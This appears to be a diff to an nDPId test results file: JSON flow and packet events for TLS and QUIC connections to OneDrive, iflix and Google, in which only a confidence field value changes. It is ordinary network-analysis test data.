00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":487,"source":"sites.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495710534,"flow_last_seen":1646495710534,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495710534,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.13","src_port":56836,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"sites.pcapng","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1646495710534,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495710534,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8CqVAAEAGNnfAqAGADWsqDd4EAbvOscftAAAAAKAC+vD21AAAAgQFtAQCCArXIg8YAAAAAAEDAwc="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"sites.pcapng","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1646495710555,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646495710555,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0VKNAAHUGt4ANayoNwKgBgAG73gT+RZAmzrHH7oAS\/\/9wpwAAAgQFoAEDAwgBAQQC"} 01151{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":489,"source":"sites.pcapng","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1646495710557,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646495710557,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItCqdAAEAGNITAqAGADWsqDd4EAbvOscfu\/kWQJ1AYAfaM8QAAFgMBAgABAAH8AwNoOd\/HU8dseMv53a0gjDg57feHmv3ZKYt3PSUCEOAz7yDC+9qh9Lsnn2pjQO0NmdEK9+51DwzlDpkQTXJ0hGSXhgAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAWABQAABFvbmVkcml2ZS5saXZlLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACAI7FYCMeLngdMxbkPLy3IoQelSFCsyCvetq1oFf6z+UQAXAEEEWlI8xcTn+Mao6N7i2Le6X1KJI9pYZKIE\/2dqJMzsIrHC0C7HZlpYDP5BCM3Qrb983QL8azL17uscE+MtJARpvAArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":489,"source":"sites.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495710534,"flow_last_seen":1646495710557,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495710557,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.13","src_port":56836,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.MS_OneDrive","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"onedrive.live.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01328{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":494,"source":"sites.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1646495710534,"flow_last_seen":1646495710577,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6361,"flow_avg_l4_payload_len":795,"midstream":0,"thread_ts_msec":1646495710577,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.13","src_port":56836,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.MS_OneDrive","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"onedrive.live.com","server_names":"onedrive.com,p.sfx.ms,*.live.com,*.live.net,*.skydrive.live.com,*.onedrive.live.com,*.onedrive.com,d.sfx-df.ms,*.odwebb.svc.ms,*.odwebp.svc.ms,*.odwebdf.svc.ms,*.odwebpl.svc.ms","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"a66ea560599a2f5c89eec8c3a0d69cee","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02","subjectDN":"CN=onedrive.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"77:7F:F2:95:29:A7:E3:CC:0F:BF:2F:BA:2E:6F:2A:38:62:8B:48:4D"}} +00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":489,"source":"sites.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495710534,"flow_last_seen":1646495710557,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495710557,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.13","src_port":56836,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.MS_OneDrive","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"onedrive.live.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01328{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":494,"source":"sites.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1646495710534,"flow_last_seen":1646495710577,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6361,"flow_avg_l4_payload_len":795,"midstream":0,"thread_ts_msec":1646495710577,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.13","src_port":56836,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.MS_OneDrive","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"onedrive.live.com","server_names":"onedrive.com,p.sfx.ms,*.live.com,*.live.net,*.skydrive.live.com,*.onedrive.live.com,*.onedrive.com,d.sfx-df.ms,*.odwebb.svc.ms,*.odwebp.svc.ms,*.odwebdf.svc.ms,*.odwebpl.svc.ms","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"a66ea560599a2f5c89eec8c3a0d69cee","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02","subjectDN":"CN=onedrive.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"77:7F:F2:95:29:A7:E3:CC:0F:BF:2F:BA:2E:6F:2A:38:62:8B:48:4D"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":497,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495749875,"flow_last_seen":1646495749875,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495749875,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"129.226.107.210","src_port":45014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":497,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1646495749875,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495749875,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8bgJAAEAGHN3AqAGAgeJr0q\/WAbvpKcA1AAAAAKAC+vDq5gAAAgQFtAQCCAoyACVaAAAAAAEDAwc="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":498,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1646495750196,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646495750196,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0AABAAC8Gm+eB4mvSwKgBgAG7r9bNFCqu6SnANoASOQgzewAAAgQFoAEBBAIBAwMH"} 01153{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":499,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1646495750202,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646495750202,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItbgRAAEAGGurAqAGAgeJr0q\/WAbvpKcA2zRQqr1AYAfYZ+QAAFgMBAgABAAH8AwMSMXO4WcNq177CYxST5Cayi57AGXeQdEMNPed0f\/vO+CBsnRDIIeROJeOlCByvk7lr9pRUbeR06Cs4dVzQT0oYEAAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAASABAAAA13d3cuaWZsaXguY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIOmUL4m7jSQuaHGCv6++\/yOU0VJCaPyexIMcIsguXG5nABcAQQTHBHql0\/iCD7AqH7jE0qyA2MF\/+\/iD9HNmfv2msqiXNFGoZilNx52dlYpSngcjMahYCZatuJxecuXUWxhAYPfzACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00887{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":499,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495749875,"flow_last_seen":1646495750202,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495750202,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"129.226.107.210","src_port":45014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.IFLIX","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iflix.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":500,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646495749875,"flow_last_seen":1646495750523,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":1949,"flow_avg_l4_payload_len":487,"midstream":0,"thread_ts_msec":1646495750523,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"129.226.107.210","src_port":45014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.IFLIX","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iflix.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"00447ab319e9d94ba2b4c1248e155917","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01507{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":502,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646495749875,"flow_last_seen":1646495750523,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":4189,"flow_avg_l4_payload_len":698,"midstream":0,"thread_ts_msec":1646495750523,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"129.226.107.210","src_port":45014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.IFLIX","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iflix.com","server_names":"jan18-2022-1.ias.iflix.com,access.iflix.com,accounts.iflix.com,debugaccess.iflix.com,hwvip.iflix.com,iflix.com,live.iflix.com,pbaccess.iflix.com,pbdebugaccess.iflix.com,test.iflix.com,testupload.iflix.com,tv.iflix.com,upload.iflix.com,vplay.iflix.com,www.iflix.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"00447ab319e9d94ba2b4c1248e155917","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert Secure Site CN CA G3","subjectDN":"C=CN, ST=Guangdong Province, L=Shenzhen, O=Shenzhen Tencent Computer Systems Company Limited, CN=jan18-2022-1.ias.iflix.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"6F:FD:C1:38:F4:2A:0B:65:51:9C:0E:11:86:63:B5:58:52:FC:96:B0"}} +00887{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":499,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495749875,"flow_last_seen":1646495750202,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495750202,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"129.226.107.210","src_port":45014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.IFLIX","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iflix.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":500,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646495749875,"flow_last_seen":1646495750523,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":1949,"flow_avg_l4_payload_len":487,"midstream":0,"thread_ts_msec":1646495750523,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"129.226.107.210","src_port":45014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.IFLIX","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iflix.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"00447ab319e9d94ba2b4c1248e155917","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01507{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":502,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646495749875,"flow_last_seen":1646495750523,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":4189,"flow_avg_l4_payload_len":698,"midstream":0,"thread_ts_msec":1646495750523,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"129.226.107.210","src_port":45014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.IFLIX","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iflix.com","server_names":"jan18-2022-1.ias.iflix.com,access.iflix.com,accounts.iflix.com,debugaccess.iflix.com,hwvip.iflix.com,iflix.com,live.iflix.com,pbaccess.iflix.com,pbdebugaccess.iflix.com,test.iflix.com,testupload.iflix.com,tv.iflix.com,upload.iflix.com,vplay.iflix.com,www.iflix.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"00447ab319e9d94ba2b4c1248e155917","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert Secure Site CN CA G3","subjectDN":"C=CN, ST=Guangdong Province, L=Shenzhen, O=Shenzhen Tencent Computer Systems Company Limited, CN=jan18-2022-1.ias.iflix.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"6F:FD:C1:38:F4:2A:0B:65:51:9C:0E:11:86:63:B5:58:52:FC:96:B0"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":505,"source":"sites.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495785326,"flow_last_seen":1646495785326,"flow_idle_time":200000,"flow_min_l4_payload_len":1357,"flow_max_l4_payload_len":1357,"flow_tot_l4_payload_len":1357,"flow_avg_l4_payload_len":1357,"midstream":0,"thread_ts_msec":1646495785326,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"216.58.212.142","src_port":38642,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02271{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":505,"source":"sites.pcapng","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1646495785326,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1399,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1399,"pkt_l4_len":1365,"thread_ts_msec":1646495785326,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAVpAABAAEARxpLAqAGA2DrUjpbyAbsFVWFvygAAAAEIEaJhA\/pmmGIDGZVnAEJ9k4MXlQzkENByBWBPG6JdLnJ97tZTge\/8kX\/RhzOqc4jakqIni2HiqmCs6hTSmZEhkbOUs3lvKsO9F9+XIhOeXqIykOCxzeDPOvDHVnxP2ftNUD1lroHjevW4+JYs\/R0VPIgtCayG\/meCf7Lef9QhWL6YQmXx48ui2W6tYfyIEiaXDMtExoqL+hacVg2HpNlIwJe4PE0\/HEg3ezCS0HD8j4RVM2gk+MitT95qpQmfRz8ntx5WznfpVZvMxU23bid9\/dO3KP4LRTXApe0VNoqcMS8eAgkUyCgd5nSQ87LPgFqnkCEFratISm41sDhhr7ve32C1I\/TlAIhgBRfW87C3WFDVCBagaYOeonExydEo\/D28evz\/tjH6aV7xu0wNblTQywt3lynmNkuwCW7cnmeQuau6oQOA9GiSOfN51L3rFmCObunfGa2ezZE4y2FjFlEEKO\/QIf2CassSbDJm49YK5w7PoSq58kn\/6qIb0Tn5xVj\/LonVQw1HAkNmcP8ql0C7shrF43UdoYXvT\/hOCOA\/VAd6JiIod3M38vXNHkTBOnLJf9TfjJE64UfVXvq5UqVG0r6WldLJGu2xtNgpeDi11dyXdfvaPJX4DN1wutu28hbCiIktfSp6wZpMBmAyygGuO73TqglRovt2xSE4EHwrJMCD4O2TYEurb9uUa0gMyyJFr9\/L+BwLQIYk52z2VLzFmq3EMYlrlu4r\/zm7z83+qa7ryx2Qegl3wdMjyEciWgqgcac28uJhD3lOGWLmvmFxM9fEY1jJKzrVnaWs\/i+ophLeLFpkmeSef74TmyzGpEZIsuPNpoyrlLRH7YPjpxJQS81Wg3bRzpRPypt93N8AAAABCBGiYQP6ZphiAxmVZ0A7KMwiGjnAKddrCOyv2PDiBRWs1qpECiw2xTVInm4f3DIdG9S3r6Co1Q+QqgROt51vL3O9dOvlXAZmpcYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00824{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":505,"source":"sites.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495785326,"flow_last_seen":1646495785326,"flow_idle_time":200000,"flow_min_l4_payload_len":1357,"flow_max_l4_payload_len":1357,"flow_tot_l4_payload_len":1357,"flow_avg_l4_payload_len":1357,"midstream":0,"thread_ts_msec":1646495785326,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"216.58.212.142","src_port":38642,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"hangouts.google.com","version":"TLSv1.3","alpn":"h3","ja3":"2a18e6bf307f97c5e27f0ab407dc65db","tls_supported_versions":"TLSv1.3"}} +00824{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":505,"source":"sites.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495785326,"flow_last_seen":1646495785326,"flow_idle_time":200000,"flow_min_l4_payload_len":1357,"flow_max_l4_payload_len":1357,"flow_tot_l4_payload_len":1357,"flow_avg_l4_payload_len":1357,"midstream":0,"thread_ts_msec":1646495785326,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"216.58.212.142","src_port":38642,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"hangouts.google.com","version":"TLSv1.3","alpn":"h3","ja3":"2a18e6bf307f97c5e27f0ab407dc65db","tls_supported_versions":"TLSv1.3"}} 02279{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":506,"source":"sites.pcapng","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1646495785351,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1399,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1399,"pkt_l4_len":1365,"thread_ts_msec":1646495785351,"pkt":"PKn0qB\/spJGxgjQ5CABFgAVpAABAADMR0xLYOtSOwKgBgAG7lvIFVdbOwgAAAAEDGZVnCBGiYQP6ZphiAEPst9JjIfZ6zFXkACoVjtJE04mEvUBO80J9CXDI1AzGWloBOqzPXI+URdYvHEecgUeYllSRgTGQ\/pdzmzfdkga4V0DlNh9sMthgcZTrWfMiNpOkeHh+8VGEpoSOyr5bTtr6qKEGYg7ZZM+3g8CNri4\/Y4rmU\/u2ucvFt3wUyTEBNlGlntUryhGUoERRNT55NmFJqVuhU\/GueMTfSHsKfOOCMhdksMgHmrVyRumUWVrccMpyqwcE3vpmgCs+uFNthYNXlEj8FMdYAA6FIKpTcrXTgZ3Nm3DRRlDCt76rYa9Ed5zm8JxO+MhvWTGGpqVfgXpQEWyeWMNxG693XFsxTB07PJ3\/YeWP9LrYnM2HgdinrEmJ9dHI16vwi5FQ0cWQJ92cHEvIGKGiq8SA5HEgTnQVmdK2xOmx7dj0KaicL3ol58t8ltkbIXgfkxYhp5yyTHcH3z0UKdCT7GAS6tTRIUS1R7xH75rixlq6B8ZSkGHfajnn6P2ZcdZ\/x0f91Ed0FleO4gdbHHIHetNxBiPPjmSYid1gKObR53SjxAV83g\/W5uVBPG0cabwLojDjBF4yItmMF8ard0uchzKjL7+VPzEBpyA8VAKvlvVbjeonWQ9zdLjCu+3DI5DnZF04lHG772bPMCDbbp1L2TwHKUlogQBjbGpHA7cGqXQ+7rgXzsp8A1LJ4M7UOfhwAhpEZinbjHrtptlKXt3FIxug5QT3rZRFmRCTzNoEN+lueCUbvABz5ahUadsFXVwk+QV6y6OfittlgN9FPzvu2wbXQsdpR7HuGw5be5n5hrjM\/gt9Cn1qYtj8W7tpYyeOF6J2KVyL\/JC\/QJoDFTRmNJOaSu8I9GPipG+PZyHfbkz460Q5SYy9J6Yty8H0OpgvMOxAZyJfdY6HpBJ73a3hMG\/oeLH2XJGbp7tfnJSbIrw7OjnmUjZjC3QFC5ZT\/D9lfLZQtLioZhFU2dvfGzIgp3e6A6JbEE0vFluuvChl2C+0rBUUI4BDQaLDC36yd\/nqeU9YkBNuGMLNwmS1nu9FZU8mcDANqVoY5yVLg2kamNS5X1hNq7e0ZttiC++uqF2vAilhDlKm4Sn9UjPckZuiZBomYpyg0Mx2VTEwtpKds6MA+UAswT6IhWCQVBWewjai+fOWFc9I1PVuJXv6wszew3Hcqcb00f6u5LLpYQLzSeihJuZrVlM1j6lGBHe0EhJ6DL1teURdZuXWHdzyDqDjp983xiqcs411z8ivoxsAQrnJoCWJxd7jZsORlrj+qRu70MzdRwWows6Ir5D2WLnk\/xr5xZXlxc0qq35KzQxuScxBBYPpS5ZzPphWbiD4nd3CHT+adzTjAAAAAQMZlWcIEaJhA\/pmmGJA9VVpI4dKlmrgeF\/YggQi8sjf99E3nv5OtPvRrtZcyuW01yoBM35YdPwOsg50xXr\/BiQRHRmpg5AI\/Gxv40hVq1L2PZoVADVhqqGncF1oScVHTbM9W4m3oXbHay